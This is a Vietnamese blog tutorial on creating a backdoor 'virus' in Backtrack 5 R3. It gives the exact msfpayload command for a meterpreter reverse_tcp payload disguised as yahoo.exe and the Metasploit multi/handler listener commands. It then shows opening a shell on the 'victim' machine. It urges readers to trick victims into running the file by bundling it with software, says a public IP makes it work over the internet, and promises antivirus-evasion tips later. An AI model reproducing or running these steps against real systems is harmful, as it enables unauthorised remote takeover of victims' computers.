Hướng dẫn tạo virus backdoor trong Backtrack 5 R3 (Clip)

Buồn tình nên ngồi viết tut này và làm clip demo chia sẻ cho anh em, ắt hẳn việc tạo 1 con virus đối với các beginer hoặc IT network không có kiến thức lập trình là 1 điều vô cùng khó, chưa kể nếu lấy các con virus được chia sẻ trên mạng, chúng ta cũng sẽ chẳng biết chúng ta có trở thành nạn nhân của người chủ con virus đó không.

Vì thế, hôm nay mình sẽ hướng dẫn các bạn cách tạo 1 con backdoor  trong Backtrack 1 cách vô cùng đơn giản, không cần kiến thức lập trình gì cả, và con virus này cũng do chính bạn tạo ra nên bạn không phải lo lắng về việc trở thành nạn nhân của ai cả. Trong bài viết này mình chỉ hướng dẫn trong mạng Lan, còn muốn dùng trên internet thì bạn chỉ việc đổi IP private của host thành IP public là được.

Trước hết Backdoor là gì, backdoor đơn giản là  loại virus có tác dụng mở cổng kết nối tới nạn nhân nhằm lấy thông tin cá nhân trên máy nạn nhân hoặc điều khiển máy nạn nhân phục vụ cho việc triển khai tấn công DDos tới các nạn nhân khác. Khi nạn nhân đã thực thi file virus, bạn hầu như có thể chiếm quyền điều khiển toàn diện của máy nạn nhân tùy vào khả năng của bạn.

Trước khi bắt đầu vào làm, mình cũng xin nhắc lại, bài viết mang tính chất thảm khảo và nghiên cứu, vọc phá, không dành cho mục đích xấu, nên mong các bạn cân nhắc trước khi làm chuyện phạm pháp. Và mình sẽ chỉ hỗ trợ cho các bạn đã có kiến thức nhưng làm chưa ra, các câu hỏi vô nghĩa như “bạn hack dùm mình được không, bạn chỉ mình làm với, bạn hướng dẫn chi tiết cho mình với…..bla..bla..bla” thì mình xin phép không trả lời.

Bắt tay vào làm thôi, đầu tiên dùng lệnh ifconfig kiểm tra IP của máy Backtrack, ở đây IP máy backtrack là 192.168.1.4

BACKDOOR1

Tiếp theo, dùng câu lệnh sau để tạo con Backdoor  với tên yahoo.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 x > /root/Desktop/yahoo.exe

SnapCrab_NoName_2014-3-13_21-16-37_No-00

Trong đó, LHOST là địa chỉ IP máy host (backtrack)

LPORT là cổng mà chúng ta kết nối với nạn nhân

Đây là file yahoo.exe mà ta vừa tạo ra

SnapCrab_NoName_2014-3-13_21-19-58_No-00

Giờ ta sẽ bật chế độ lắng nghe để chờ con mồi sập  bẫy thôi, ta chạy 2 câu lệnh sau để chuyển tới thư mục framework để chạy chế độ msfconsole

cd /pentest/exploit/framwork
./msfconsole

SnapCrab_NoName_2014-3-13_21-22-37_No-00

Trong chế độ msfconsole, chúng ta chạy các câu lệnh sau thì bắt đầu mở cổng ngồi đợi..:)

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 4444
set channel 1
exploit

SnapCrab_NoName_2014-3-13_21-25-56_No-00

Giờ mình sẽ gửi file đó qua cho nạn nhân ở máy xp

SnapCrab_NoName_2014-3-13_21-33-59_No-00

Sau khi nạn nhân chạy file yahoo.exe, bên máy backtrack, bạn sẽ thấy chúng ta đã kết nổi tới được máy nạn nhân như trong hình

SnapCrab_NoName_2014-3-13_21-34-52_No-00

Thế là xong rồi đó, mình sẽ sử dụng 1 số câu lệnh để xem máy nạn nhân trong môi trường DOS

sysinfo (để xem thông tin máy nạn nhân)

Shell ( để vào môi trường DOS trên máy nạn nhân)

SnapCrab_NoName_2014-3-13_21-35-56_No-00

Tới đây xem như là bạn đã chiếm được quyền điều khiển của máy nạn nhân rồi đó, chỉ còn tùy thuộc vào khả năng sử dụng DOS của bạn như thế nào thôi.
Còn con virus, bạn tự nghĩ cách làm sao để dụ dỗ nạn nhân click vào nhé, tùy khả năng lừa tình của bạn…^^, ví dụ: bạn có thể combine với 1 phần mềm nào đó.
À, lưu ý, nếu máy nạn nhân có phần mềm diệt virus thì virus ko có tác dụng, nếu bạn muốn vượt mặt được phần mềm diệt virus, hãy chịu khó nghiên cứu thêm, có thời gian mình sẽ viết tut hướng dẫn sau.

Đây là clip làm hoàn chỉnh của mình cho các bạn dễ hình dung.

Nguồn: http://tranminhtuyen.wordpress.com/2014/03/14/huong-dan-tao-virus-backdoor-trong-backtrack-5-r3-clip/

Leave a comment